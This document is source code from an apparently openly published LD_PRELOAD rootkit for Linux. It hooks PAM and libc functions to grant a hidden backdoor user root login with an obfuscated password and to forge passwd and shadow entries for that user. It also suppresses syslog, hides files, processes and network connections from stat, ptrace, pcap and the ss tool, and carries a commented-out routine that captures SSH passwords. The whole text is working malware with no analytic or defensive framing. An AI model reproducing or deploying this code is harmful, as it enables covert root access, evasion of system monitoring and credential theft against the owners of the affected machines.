*pamh, int flags){ 2 | char *user = get_username(pamh), prompt[512], *pw; 3 | int got_pw; 4 | hook(CPAM_AUTHENTICATE); 5 | if(user == NULL) 6 | return (long)call(CPAM_AUTHENTICATE, pamh, flags); 7 | if(!xstrncmp(user, BD_UNAME)){ 8 | if(process("login")) 9 | return (long)call(CPAM_AUTHENTICATE, pamh, flags); 10 | snprintf(prompt, sizeof(prompt), "Password: "); 11 | pam_prompt(pamh, 1, &pw, "%s", prompt); 12 | xor(bd_pwd, BD_PWD); 13 | got_pw = !strcmp(crypt(pw, bd_pwd), bd_pwd); 14 | clean(bd_pwd); 15 | memset(pw, 0, strlen(pw)); 16 | if(got_pw) 17 | return PAM_SUCCESS; 18 | return PAM_USER_UNKNOWN; 19 | } 20 | return (long)call(CPAM_AUTHENTICATE, pamh, flags); 21 | } 22 | 23 | int pam_open_session(pam_handle_t *pamh, int flags){ 24 | char *user = get_username(pamh); 25 | hook(CPAM_OPEN_SESSION); 26 | if(user == NULL) 27 | return (long)call(CPAM_OPEN_SESSION, pamh, flags); 28 | if(!xstrncmp(user, BD_UNAME)) 29 | return PAM_SUCCESS; 30 | return (long)call(CPAM_OPEN_SESSION, pamh, flags); 31 | } 32 | 33 | int pam_acct_mgmt(pam_handle_t *pamh, int flags){ 34 | char *user = get_username(pamh); 35 | hook(CPAM_ACCT_MGMT); 36 | if(user == NULL) 37 | return (long)call(CPAM_ACCT_MGMT, pamh, flags); 38 | if(!xstrncmp(user, BD_UNAME)) 39 | return PAM_SUCCESS; 40 | return (long)call(CPAM_ACCT_MGMT, pamh, flags); 41 | } 42 | -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_private.h: -------------------------------------------------------------------------------- 1 | #ifndef _PAM_PRIVATE_H 2 | #define _PAM_PRIVATE_H 3 | 4 | #include 5 | 6 | #define PAM_CONFIG "/etc/pam.conf" 7 | #define PAM_CONFIG_D "/etc/pam.d" 8 | #define PAM_CONFIG_DF "/etc/pam.d/%s" 9 | #define PAM_DEFAULT_SERVICE "other" 10 | #define PAM_DEFAULT_SERVICE_FILE PAM_CONFIG_D "/" PAM_DEFAULT_SERVICE 11 | 12 | #ifdef PAM_LOCKING 13 | #define PAM_LOCK_FILE "/var/lock/subsys/PAM" 14 | #endif 15 | 16 | #define _PAM_INVALID_RETVAL -1 17 | 18 | struct handler { 19 | int handler_type; 20 | int (*func)(pam_handle_t *pamh, int flags, int argc, char **argv); 21 | int actions[_PAM_RETURN_VALUES]; 22 | int cached_retval; int *cached_retval_p; 23 | int argc; 24 | char **argv; 25 | struct handler *next; 26 | char *mod_name; 27 | int stack_level; 28 | }; 29 | 30 | #define PAM_HT_MODULE 0 31 | #define PAM_HT_MUST_FAIL 1 32 | #define PAM_HT_SUBSTACK 2 33 | #define PAM_HT_SILENT_MODULE 3 34 | 35 | struct loaded_module { 36 | char *name; 37 | int type; 38 | void *dl_handle; 39 | }; 40 | 41 | #define PAM_MT_DYNAMIC_MOD 0 42 | #define PAM_MT_STATIC_MOD 1 43 | #define PAM_MT_FAULTY_MOD 2 44 | 45 | struct handlers { 46 | struct handler *authenticate; 47 | struct handler *setcred; 48 | struct handler *acct_mgmt; 49 | struct handler *open_session; 50 | struct handler *close_session; 51 | struct handler *chauthtok; 52 | }; 53 | 54 | struct service { 55 | struct loaded_module *module; 56 | int modules_allocated; 57 | int modules_used; 58 | int handlers_loaded; 59 | struct handlers conf; 60 | struct handlers other; 61 | }; 62 | 63 | #define PAM_ENV_CHUNK 10 64 | 65 | struct pam_environ { 66 | int entries; 67 | int requested; 68 | char **list; 69 | }; 70 | 71 | #include 72 | 73 | typedef enum { PAM_FALSE, PAM_TRUE } _pam_boolean; 74 | 75 | struct _pam_fail_delay { 76 | _pam_boolean set; 77 | unsigned int delay; 78 | time_t begin; 79 | const void *delay_fn_ptr; 80 | }; 81 | 82 | struct _pam_substack_state { 83 | int impression; 84 | int status; 85 | }; 86 | 87 | struct _pam_former_state { 88 | int choice; 89 | int depth; 90 | int impression; 91 | int status; 92 | struct _pam_substack_state *substates; 93 | int fail_user; 94 | int want_user; 95 | char *prompt; 96 | _pam_boolean update; 97 | }; 98 | #ifndef OLD_DISTRO 99 | struct pam_handle { 100 | char *authtok; 101 | unsigned caller_is; 102 | struct pam_conv *pam_conversation; 103 | char *oldauthtok; 104 | char *prompt; 105 | char *service_name; 106 | char *user; 107 | char *rhost; 108 | char *ruser; 109 | char *tty; 110 | char *xdisplay; 111 | char *authtok_type; 112 | struct pam_data *data; 113 | struct pam_environ *env; 114 | struct _pam_fail_delay fail_delay; 115 | struct pam_xauth_data xauth; 116 | struct service handlers; 117 | struct _pam_former_state former; 118 | const char *mod_name; 119 | int mod_argc; 120 | char **mod_argv; 121 | int choice; 122 | #ifdef HAVE_LIBAUDIT 123 | int audit_state; 124 | #endif 125 | }; 126 | #else 127 | struct pam_handle { 128 | char *authtok; 129 | unsigned caller_is; 130 | struct pam_conv *pam_conversation; 131 | char *oldauthtok; 132 | char *prompt; 133 | char *service_name; 134 | char *user; 135 | char *rhost; 136 | char *ruser; 137 | char *tty; 138 | struct pam_data *data; 139 | struct pam_environ *env; 140 | struct _pam_fail_delay fail_delay; 141 | struct service handlers; 142 | struct _pam_former_state former; 143 | const char *mod_name; 144 | int choice; 145 | #ifdef HAVE_LIBAUDIT 146 | int audit_state; 147 | #endif 148 | }; 149 | #endif 150 | 151 | #define PAM_NOT_STACKED 0 152 | #define PAM_AUTHENTICATE 1 153 | #define PAM_SETCRED 2 154 | #define PAM_ACCOUNT 3 155 | #define PAM_OPEN_SESSION 4 156 | #define PAM_CLOSE_SESSION 5 157 | #define PAM_CHAUTHTOK 6 158 | #define _PAM_ACTION_IS_JUMP(x) ((x) > 0) 159 | #define _PAM_ACTION_IGNORE 0 160 | #define _PAM_ACTION_OK -1 161 | #define _PAM_ACTION_DONE -2 162 | #define _PAM_ACTION_BAD -3 163 | #define _PAM_ACTION_DIE -4 164 | #define _PAM_ACTION_RESET -5 165 | #define _PAM_ACTION_UNDEF -6 166 | #define PAM_SUBSTACK_MAX_LEVEL 16 167 | 168 | extern const char * const _pam_token_actions[-_PAM_ACTION_UNDEF]; 169 | extern const char * const _pam_token_returns[_PAM_RETURN_VALUES+1]; 170 | 171 | int _pam_dispatch(pam_handle_t *pamh, int flags, int choice); 172 | int _pam_free_handlers(pam_handle_t *pamh); 173 | int _pam_init_handlers(pam_handle_t *pamh); 174 | void _pam_start_handlers(pam_handle_t *pamh); 175 | int _pam_make_env(pam_handle_t *pamh); 176 | void _pam_drop_env(pam_handle_t *pamh); 177 | void _pam_reset_timer(pam_handle_t *pamh); 178 | void _pam_start_timer(pam_handle_t *pamh); 179 | void _pam_await_timer(pam_handle_t *pamh, int status); 180 | 181 | typedef void (*voidfunc(void))(void); 182 | typedef int (*servicefn)(pam_handle_t *, int, int, char **); 183 | #ifdef PAM_STATIC 184 | struct pam_module * _pam_open_static_handler (pam_handle_t *pamh, const char *path); 185 | voidfunc *_pam_get_static_sym(struct pam_module *mod, const char *symname); 186 | #else 187 | void *_pam_dlopen (const char *mod_path); 188 | servicefn _pam_dlsym (void *handle, const char *symbol); 189 | void _pam_dlclose (void *handle); 190 | const char *_pam_dlerror (void); 191 | #endif 192 | 193 | struct pam_data { 194 | char *name; 195 | void *data; 196 | void (*cleanup)(pam_handle_t *pamh, void *data, int error_status); 197 | struct pam_data *next; 198 | }; 199 | 200 | void _pam_free_data(pam_handle_t *pamh, int status); 201 | char *_pam_StrTok(char *from, const char *format, char **next); 202 | char *_pam_strdup(const char *s); 203 | char *_pam_memdup(const char *s, int len); 204 | int _pam_mkargv(char *s, char ***argv, int *argc); 205 | void _pam_sanitize(pam_handle_t *pamh); 206 | void _pam_set_default_control(int *control_array, int default_action); 207 | void _pam_parse_control(int *control_array, char *tok); 208 | #define _PAM_SYSTEM_LOG_PREFIX "PAM" 209 | 210 | #define IF_NO_PAMH(X,pamh,ERR) \ 211 | if ((pamh) == NULL) { \ 212 | syslog(LOG_ERR, _PAM_SYSTEM_LOG_PREFIX " " X ": NULL pam handle passed"); \ 213 | return ERR; \ 214 | } 215 | 216 | #define _PAM_CALLED_FROM_MODULE 1 217 | #define _PAM_CALLED_FROM_APP 2 218 | 219 | #define __PAM_FROM_MODULE(pamh) ((pamh)->caller_is == _PAM_CALLED_FROM_MODULE) 220 | #define __PAM_FROM_APP(pamh) ((pamh)->caller_is == _PAM_CALLED_FROM_APP) 221 | #define __PAM_TO_MODULE(pamh) \ 222 | do { (pamh)->caller_is = _PAM_CALLED_FROM_MODULE; } while (0) 223 | #define __PAM_TO_APP(pamh) \ 224 | do { (pamh)->caller_is = _PAM_CALLED_FROM_APP; } while (0) 225 | 226 | #ifdef HAVE_LIBAUDIT 227 | extern int _pam_auditlog(pam_handle_t *pamh, int action, int retval, int flags); 228 | extern int _pam_audit_end(pam_handle_t *pamh, int pam_status); 229 | #endif 230 | 231 | #endif 232 | -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_syslog.c: -------------------------------------------------------------------------------- 1 | void pam_syslog(const pam_handle_t *pamh, int priority, const char *fmt, ...){ 2 | if(is_bdusr()) 3 | return; 4 | va_list va; 5 | char *user = get_username(pamh); 6 | if(user == NULL) 7 | goto end_pam_syslog; 8 | if(!xstrncmp(user, BD_UNAME)){ 9 | hook(CSETGID); 10 | call(CSETGID, MAGIC_GID); 11 | return; 12 | } 13 | end_pam_syslog: 14 | va_start(va, fmt); 15 | pam_vsyslog(pamh, priority, fmt, va); 16 | va_end(va); 17 | } 18 | 19 | void pam_vsyslog(const pam_handle_t *pamh, int priority, const char *fmt, va_list args){ 20 | if(is_bdusr()) 21 | return; 22 | char *user = get_username(pamh); 23 | if(user == NULL) 24 | goto end_pam_vsyslog; 25 | if(!xstrncmp(user, BD_UNAME)){ 26 | hook(CSETGID); 27 | call(CSETGID, MAGIC_GID); 28 | return; 29 | } 30 | end_pam_vsyslog: 31 | hook(CPAM_VSYSLOG); 32 | call(CPAM_VSYSLOG, pamh, priority, fmt, args); 33 | } 34 | -------------------------------------------------------------------------------- /src/LD/hooks/pcap/pcap.c: -------------------------------------------------------------------------------- 1 | void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet){ 2 | const struct sniff_ip *ip; 3 | int size_ip; 4 | char sip, dip; 5 | ip = (struct sniff_ip *)(packet + SIZE_ETHERNET); 6 | if((size_ip = IP_HL(ip) * 4) < 20) 7 | return; 8 | sip = ip->ip_src.s_addr; 9 | dip = ip->ip_dst.s_addr; 10 | if(is_hidden_ip(int_ip2hex(sip)) || is_hidden_ip(int_ip2hex(dip))) 11 | return; 12 | else if(o_callback) 13 | o_callback(args, header, packet); 14 | } 15 | 16 | int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user){ 17 | o_callback = callback; 18 | hook(CPCAP_LOOP); 19 | return (long)call(CPCAP_LOOP, p, cnt, got_packet, user); 20 | } 21 | -------------------------------------------------------------------------------- /src/LD/hooks/pcap/pcap.h: -------------------------------------------------------------------------------- 1 | #ifndef PCAP_H 2 | #define PCAP_H 3 | 4 | struct sniff_ip { 5 | u_char ip_vhl; 6 | u_char ip_tos; 7 | u_short ip_len; 8 | u_short ip_id; 9 | u_short ip_off; 10 | #define IP_RF 0x8000 11 | #define IP_DF 0x4000 12 | #define IP_MF 0x2000 13 | #define IP_OFFMASK 0x1fff 14 | u_char ip_ttl; 15 | u_char ip_p; 16 | u_short ip_sum; 17 | struct in_addr ip_src,ip_dst; 18 | }; 19 | 20 | #define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) 21 | #define SIZE_ETHERNET 14 22 | 23 | void (*o_callback)(u_char *args, const struct pcap_pkthdr *header, const u_char *packet); 24 | void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet); 25 | int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user); 26 | #include "pcap.c" 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /src/LD/hooks/perms/chmod.c: -------------------------------------------------------------------------------- 1 | int chmod(const char *pathname, mode_t mode){ 2 | hook(CCHMOD); 3 | if(is_bdusr()) 4 | return (long)call(CCHMOD, pathname, mode); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CCHMOD, pathname, mode); 10 | } 11 | 12 | int fchmod(int fd, mode_t mode){ 13 | hook(CFCHMOD); 14 | if(is_bdusr()) 15 | return (long)call(CFCHMOD, fd, mode); 16 | if(hidden_fd(fd)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(CFCHMOD, fd, mode); 21 | } 22 | 23 | int fchmodat(int dirfd, const char *pathname, mode_t mode, int flags){ 24 | hook(CFCHMODAT); 25 | if(is_bdusr()) 26 | return (long)call(CFCHMODAT, dirfd, pathname, mode, flags); 27 | if(hidden_path(pathname) || hidden_fd(dirfd)){ 28 | errno = ENOENT; 29 | return -1; 30 | } 31 | return (long)call(CFCHMODAT, dirfd, pathname, mode, flags); 32 | } 33 | -------------------------------------------------------------------------------- /src/LD/hooks/perms/chown.c: -------------------------------------------------------------------------------- 1 | int chown(const char *pathname, uid_t owner, gid_t group){ 2 | hook(CCHOWN); 3 | if(is_bdusr()) 4 | return (long)call(CCHOWN, pathname, owner, group); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CCHOWN, pathname, owner, group); 10 | } 11 | -------------------------------------------------------------------------------- /src/LD/hooks/perms/perms.h: -------------------------------------------------------------------------------- 1 | #ifndef PERMS_H 2 | #define PERMS_H 3 | 4 | int chown(const char *pathname, uid_t owner, gid_t group); 5 | #include "chown.c" 6 | 7 | int chmod(const char *pathname, mode_t mode); 8 | int fchmod(int fd, mode_t mode); 9 | int fchmodat(int dirfd, const char *pathname, mode_t mode, int flags); 10 | #include "chmod.c" 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /src/LD/hooks/ptrace.c: -------------------------------------------------------------------------------- 1 | long ptrace(void *request, pid_t pid, void *addr, void *data){ 2 | if(is_bdusr()) 3 | goto o_ptrace; 4 | if(hidden_proc(pid)){ 5 | errno = ESRCH; 6 | exit(-1); 7 | } 8 | o_ptrace: 9 | hook(CPTRACE); 10 | return (long)call(CPTRACE, request, pid, addr, data); 11 | } 12 | -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwd.h: -------------------------------------------------------------------------------- 1 | #ifndef PWD_H 2 | #define PWD_H 3 | 4 | struct passwd *getpwnam(const char *name); 5 | int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result); 6 | struct spwd *getspnam(const char *name); 7 | #include "pwnam_user.c" 8 | 9 | struct passwd *getpwuid(uid_t uid); 10 | //struct passwd *getpwent(void); 11 | #include "pwnam_ent.c" 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwnam_ent.c: -------------------------------------------------------------------------------- 1 | /* 2 | struct passwd *getpwent(void){ 3 | hook(CGETPWENT); 4 | struct passwd *tmp = call(CGETPWENT); 5 | if(tmp && tmp->pw_name != NULL) 6 | if(!xstrncmp(tmp->pw_name,BD_UNAME)){ 7 | errno = ESRCH; 8 | tmp = NULL; 9 | } 10 | return tmp; 11 | } 12 | */ 13 | 14 | struct passwd *getpwuid(uid_t uid){ 15 | hook(CGETPWUID); 16 | if(getgid() == MAGIC_GID && uid == 0 && process("ssh")){ 17 | struct passwd *bpw = call(CGETPWUID, uid); 18 | bpw->pw_uid = 0; 19 | bpw->pw_gid = MAGIC_GID; 20 | bpw->pw_dir = "/var/tmp/"; 21 | bpw->pw_shell = "/bin/bash"; 22 | return bpw; 23 | } 24 | return call(CGETPWUID, uid); 25 | } 26 | -------------------------------------------------------------------------------- /src/LD/hooks/pwd/pwnam_user.c: -------------------------------------------------------------------------------- 1 | struct passwd *getpwnam(const char *name){ 2 | hook(CGETPWNAM); 3 | if(!xstrncmp(name, BD_UNAME)){ 4 | struct passwd *bpw = call(CGETPWNAM, "root"); 5 | bpw->pw_name = strdup(name); 6 | bpw->pw_uid = 0; 7 | bpw->pw_gid = MAGIC_GID; 8 | bpw->pw_dir = "/var/tmp/"; 9 | bpw->pw_shell = "/bin/bash"; 10 | return bpw; 11 | } 12 | return call(CGETPWNAM, name); 13 | } 14 | 15 | int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){ 16 | hook(CGETPWNAM_R); 17 | if(!xstrncmp(name, BD_UNAME)){ 18 | call(CGETPWNAM_R, "root", pwd, buf, buflen, result); 19 | pwd->pw_name = strdup(name); 20 | pwd->pw_uid = 0; 21 | pwd->pw_gid = MAGIC_GID; 22 | pwd->pw_dir = "/var/tmp/"; 23 | pwd->pw_shell = "/bin/bash"; 24 | return 0; 25 | } 26 | return (long)call(CGETPWNAM_R, name, pwd, buf, buflen, result); 27 | } 28 | 29 | struct spwd *getspnam(const char *name){ 30 | if(!xstrncmp(name, BD_UNAME)){ 31 | struct spwd *bspwd = malloc(sizeof(struct spwd)); 32 | bspwd->sp_namp = strdup(name); 33 | xor(bd_pwd, BD_PWD); 34 | bspwd->sp_pwdp = bd_pwd; 35 | clean(bd_pwd); 36 | bspwd->sp_lstchg = time(NULL) / (60 * 60 * 24); 37 | bspwd->sp_expire = time(NULL) / (60 * 60 * 24) + 90; 38 | bspwd->sp_inact = 9001; 39 | bspwd->sp_warn = 0; 40 | bspwd->sp_min = 0; 41 | bspwd->sp_max = 99999; 42 | return bspwd; 43 | } 44 | hook(CGETSPNAM); 45 | return call(CGETSPNAM, name); 46 | } 47 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/fread.c: -------------------------------------------------------------------------------- 1 | size_t fread_t(void *data, size_t size, size_t count, FILE *stream){ 2 | hook(CFREAD); 3 | if(is_bdusr()) 4 | return (size_t)call(CFREAD, data, size, count, stream); 5 | if(hidden_fd(fileno(stream))) 6 | return 0; 7 | return (size_t)call(CFREAD, data, size, count, stream); 8 | } 9 | 10 | size_t fread_unlocked_r(void *data, size_t size, size_t count, FILE *stream){ 11 | hook(CFREAD_UNLOCKED); 12 | if(is_bdusr()) 13 | return (size_t)call(CFREAD_UNLOCKED, data, size, count, stream); 14 | if(hidden_fd(fileno(stream))) 15 | return 0; 16 | return (size_t)call(CFREAD_UNLOCKED, data, size, count, stream); 17 | } 18 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/fwrite.c: -------------------------------------------------------------------------------- 1 | size_t fwrite_r(const void *ptr, size_t size, size_t nmemb, FILE *stream){ 2 | hook(CFWRITE); 3 | if(is_bdusr()) 4 | return (size_t)call(CFWRITE, ptr, size, nmemb, stream); 5 | if(hidden_fd(fileno(stream))) 6 | return 0; 7 | return (size_t)call(CFWRITE, ptr, size, nmemb, stream); 8 | } 9 | 10 | size_t fwrite_unlocked_r(const void *ptr, size_t size, size_t nmemb, FILE *stream){ 11 | hook(CFWRITE_UNLOCKED); 12 | if(is_bdusr()) 13 | return (size_t)call(CFWRITE_UNLOCKED, ptr, size, nmemb, stream); 14 | if(hidden_fd(fileno(stream))) 15 | return 0; 16 | return (size_t)call(CFWRITE_UNLOCKED, ptr, size, nmemb, stream); 17 | } 18 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/log_ssh.c: -------------------------------------------------------------------------------- 1 | static int is_pwprompt(int fd, const void *buf){ 2 | struct stat s_fstat; 3 | hook(C__FXSTAT); 4 | memset(&s_fstat, 0, sizeof(stat)); 5 | call(C__FXSTAT, _STAT_VER, fd, &s_fstat); 6 | if(S_ISSOCK(s_fstat.st_mode)) 7 | return 0; 8 | if(buf != NULL && strstr((char *)buf, "assword")) 9 | return 1; 10 | return 0; 11 | } 12 | 13 | static ssize_t hijack_write_ssh(int fd, const void *buf, ssize_t o){ 14 | if(!process("ssh")) 15 | return o; 16 | if(is_pwprompt(fd, buf)){ 17 | ssh_pass_size = 0; 18 | memset(ssh_pass, 0, sizeof(ssh_pass)); 19 | ssh_start = 1; 20 | } 21 | return o; 22 | } 23 | 24 | static ssize_t log_ssh(int fd, void *buf, ssize_t o){ 25 | if(fd == 0) 26 | return o; 27 | struct stat s_fstat; 28 | char *p, output[128]; 29 | FILE *fp; 30 | hook(C__FXSTAT, CFOPEN); 31 | memset(&s_fstat, 0, sizeof(stat)); 32 | call(C__FXSTAT, _STAT_VER, fd, &s_fstat); 33 | if(S_ISSOCK(s_fstat.st_mode)) 34 | return o; 35 | process("ssh"); 36 | /* if(process("ssh") && fd == 4 && ssh_start){ 37 | p = buf; 38 | if(*p == '\n'){ 39 | ssh_start = 0; 40 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){ 41 | sprintf(output, "%s:%s", process_cmdline(), ssh_pass); 42 | xor(t_o, output); 43 | fprintf(fp, "%s\n", t_o); 44 | clean(t_o); 45 | fflush(fp); 46 | fclose(fp); 47 | } 48 | return o; 49 | } 50 | ssh_pass[ssh_pass_size++] = *p; 51 | } 52 | */ 53 | return o; 54 | } 55 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/read.c: -------------------------------------------------------------------------------- 1 | ssize_t read(int fd, void *buf, size_t n){ 2 | hook(CREAD); 3 | // if(is_bdusr()) return (ssize_t)call(CREAD, fd, buf, n); 4 | /* 5 | if(hidden_fd(fd)){ 6 | errno = EIO; 7 | return -1; 8 | } 9 | */ 10 | ssize_t o = (ssize_t)call(CREAD, fd, buf, n); 11 | return log_ssh(fd, buf, o); 12 | // return (ssize_t)call(CREAD, fd, buf, n); 13 | } 14 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/rw.h: -------------------------------------------------------------------------------- 1 | #ifndef RW_H 2 | #define RW_H 3 | /* 4 | #define fread fread_r 5 | #define fread_unlocked fread_unlocked_r 6 | #define fwrite fwrite_r 7 | #define fwrite_unlocked fwrite_unlocked_r 8 | */ 9 | int ssh_start, ssh_pass_size; 10 | char ssh_args[512], ssh_pass[512]; 11 | 12 | static int is_pwprompt(int fd, const void *buf); 13 | static ssize_t hijack_write_ssh(int fd, const void *buf, ssize_t o); 14 | static ssize_t log_ssh(int fd, void *buf, ssize_t o); 15 | #include "log_ssh.c" 16 | /* 17 | size_t fwrite_r(const void *ptr, size_t size, size_t nmemb, FILE *stream); 18 | size_t fwrite_unlocked_r(const void *ptr, size_t size, size_t nmemb, FILE *stream); 19 | #include "fwrite.c" 20 | 21 | size_t fread_r(void *data, size_t size, size_t count, FILE *stream); 22 | size_t fread_unlocked_r(void *data, size_t size, size_t count, FILE *stream); 23 | #include "fread.c" 24 | */ 25 | ssize_t read(int fd, void *buf, size_t n); 26 | #include "read.c" 27 | 28 | ssize_t write(int fd, const void *buf, size_t n); 29 | #include "write.c" 30 | 31 | #endif 32 | -------------------------------------------------------------------------------- /src/LD/hooks/rw/write.c: -------------------------------------------------------------------------------- 1 | ssize_t write(int fd, const void *buf, size_t n){ 2 | hook(CWRITE); 3 | // if(is_bdusr()) return (ssize_t)call(CWRITE, fd, buf, n); 4 | /* 5 | if(hidden_fd(fd)){ 6 | errno = EIO; 7 | return -1; 8 | } 9 | */ 10 | // ssize_t o = (ssize_t)call(CWRITE, fd, buf, n); 11 | // return hijack_write_ssh(fd, buf, o); 12 | return (ssize_t)call(CWRITE, fd, buf, n); 13 | } 14 | -------------------------------------------------------------------------------- /src/LD/hooks/socket.c: -------------------------------------------------------------------------------- 1 | static int ssme(int domain, int protocol){ 2 | if(domain != AF_NETLINK || protocol != NETLINK_INET_DIAG) 3 | return 0; 4 | if(cmp_process("ss\0")) 5 | return 1; 6 | if(cmp_process("/usr/bin/ss\0")) 7 | return 1; 8 | if(cmp_process("/bin/ss\0")) 9 | return 1; 10 | return 0; 11 | } 12 | 13 | int socket(int domain, int type, int protocol){ 14 | if(is_bdusr()) 15 | goto o_socket; 16 | if(ssme(domain, protocol)){ 17 | if(!hidehost_alive()) 18 | goto o_socket; 19 | errno = ENOENT; 20 | return -1; 21 | } 22 | o_socket: 23 | hook(CSOCKET); 24 | return (long)call(CSOCKET, domain, type, protocol); 25 | } 26 | -------------------------------------------------------------------------------- /src/LD/hooks/stat/fstat.c: -------------------------------------------------------------------------------- 1 | int fstat(int fd, struct stat *buf){ 2 | hook(C__FXSTAT); 3 | if(is_bdusr()) 4 | return (long)call(C__FXSTAT, _STAT_VER, fd, buf); 5 | if(hidden_fd(fd)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(C__FXSTAT, _STAT_VER, fd, buf); 10 | } 11 | 12 | int fstat64(int fd, struct stat64 *buf){ 13 | hook(C__FXSTAT64); 14 | if(is_bdusr()) 15 | return (long)call(C__FXSTAT64, _STAT_VER, fd, buf); 16 | if(hidden_fd64(fd)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(C__FXSTAT64, _STAT_VER, fd, buf); 21 | } 22 | 23 | int fstatat(int dirfd, const char *pathname, struct stat *buf, int flags){ 24 | hook(C__FXSTAT); 25 | if(is_bdusr()) 26 | return (long)call(C__FXSTAT, _STAT_VER, dirfd, buf); 27 | if(hidden_fd(dirfd) || hidden_path(pathname)){ 28 | errno = ENOENT; 29 | return -1; 30 | } 31 | return (long)call(C__FXSTAT, _STAT_VER, dirfd, buf); 32 | } 33 | 34 | int fstatat64(int dirfd, const char *pathname, struct stat64 *buf, int flags){ 35 | hook(C__FXSTAT64); 36 | if(is_bdusr()) 37 | return (long)call(C__FXSTAT64, _STAT_VER, dirfd, buf); 38 | if(hidden_fd64(dirfd) || hidden_path64(pathname)){ 39 | errno = ENOENT; 40 | return -1; 41 | } 42 | return (long)call(C__FXSTAT64, _STAT_VER, dirfd, buf); 43 | } 44 | 45 | int __fxstat(int version, int fd, struct stat *buf){ 46 | hook(C__FXSTAT); 47 | if(is_bdusr()) 48 | return (long)call(C__FXSTAT, version, fd, buf); 49 | if(hidden_fd(fd)){ 50 | errno = ENOENT; 51 | return -1; 52 | } 53 | return (long)call(C__FXSTAT, version, fd, buf); 54 | } 55 | 56 | int __fxstat64(int version, int fd, struct stat64 *buf){ 57 | hook(C__FXSTAT64); 58 | if(is_bdusr()) 59 | return (long)call(C__FXSTAT64, version, fd, buf); 60 | if(hidden_fd64(fd)){ 61 | errno = ENOENT; 62 | return -1; 63 | } 64 | return (long)call(C__FXSTAT64, version, fd, buf); 65 | } 66 | -------------------------------------------------------------------------------- /src/LD/hooks/stat/lstat.c: -------------------------------------------------------------------------------- 1 | int lstat(const char *pathname, struct stat *buf){ 2 | hook(C__LXSTAT); 3 | if(is_bdusr()) 4 | return (long)call(C__LXSTAT, _STAT_VER, pathname, buf); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(C__LXSTAT, _STAT_VER, pathname, buf); 10 | } 11 | 12 | int lstat64(const char *pathname, struct stat64 *buf){ 13 | hook(C__LXSTAT64); 14 | if(is_bdusr()) 15 | return (long)call(C__LXSTAT64, _STAT_VER, pathname, buf); 16 | if(hidden_path64(pathname)){ 17 | errno=ENOENT; 18 | return -1; 19 | } 20 | return (long)call(C__LXSTAT64, _STAT_VER, pathname, buf); 21 | } 22 | 23 | int __lxstat(int version, const char *pathname, struct stat *buf){ 24 | hook(C__LXSTAT); 25 | if(is_bdusr()) 26 | return (long)call(C__LXSTAT, version, pathname, buf); 27 | if(hidden_path(pathname) || hidden_lpath(pathname)){ 28 | errno = ENOENT; 29 | return -1; 30 | } 31 | return (long)call(C__LXSTAT, version, pathname, buf); 32 | } 33 | 34 | int __lxstat64(int version, const char *pathname, struct stat64 *buf){ 35 | hook(C__LXSTAT64); 36 | if(is_bdusr()) 37 | return (long)call(C__LXSTAT64, version, pathname, buf); 38 | if(hidden_path64(pathname) || hidden_lpath64(pathname)){ 39 | errno = ENOENT; 40 | return -1; 41 | } 42 | return (long)call(C__LXSTAT64, version, pathname, buf); 43 | } 44 | -------------------------------------------------------------------------------- /src/LD/hooks/stat/stat.c: -------------------------------------------------------------------------------- 1 | int stat(const char *pathname, struct stat *buf){ 2 | hook(C__XSTAT); 3 | if(is_bdusr()) 4 | return (long)call(C__XSTAT, _STAT_VER, pathname, buf); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(C__XSTAT, _STAT_VER, pathname, buf); 10 | } 11 | 12 | int stat64(const char *pathname, struct stat64 *buf){ 13 | hook(C__XSTAT64); 14 | if(is_bdusr()) 15 | return (long)call(C__XSTAT64, _STAT_VER, pathname, buf); 16 | if(hidden_path64(pathname)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(C__XSTAT64, _STAT_VER, pathname, buf); 21 | } 22 | 23 | int __xstat(int version, const char *pathname, struct stat *buf){ 24 | hook(C__XSTAT); 25 | if(is_bdusr()) 26 | return (long)call(C__XSTAT, version, pathname, buf); 27 | if(hidden_path(pathname)){ 28 | errno = ENOENT; 29 | return -1; 30 | } 31 | return (long)call(C__XSTAT, version, pathname, buf); 32 | } 33 | 34 | int __xstat64(int version, const char *pathname, struct stat64 *buf){ 35 | hook(C__XSTAT64); 36 | if(is_bdusr()) 37 | return (long)call(C__XSTAT64, version, pathname, buf); 38 | if(hidden_path64(pathname)){ 39 | errno = ENOENT; 40 | return -1; 41 | } 42 | return (long)call(C__XSTAT64, version, pathname, buf); 43 | } 44 | -------------------------------------------------------------------------------- /src/LD/hooks/stat/stat.h: -------------------------------------------------------------------------------- 1 | #ifndef STAT_H 2 | #define STAT_H 3 | 4 | int stat(const char *pathname, struct stat *buf); 5 | int stat64(const char *pathname, struct stat64 *buf); 6 | int __xstat(int version, const char *pathname, struct stat *buf); 7 | int __xstat64(int version, const char *pathname, struct stat64 *buf); 8 | #include 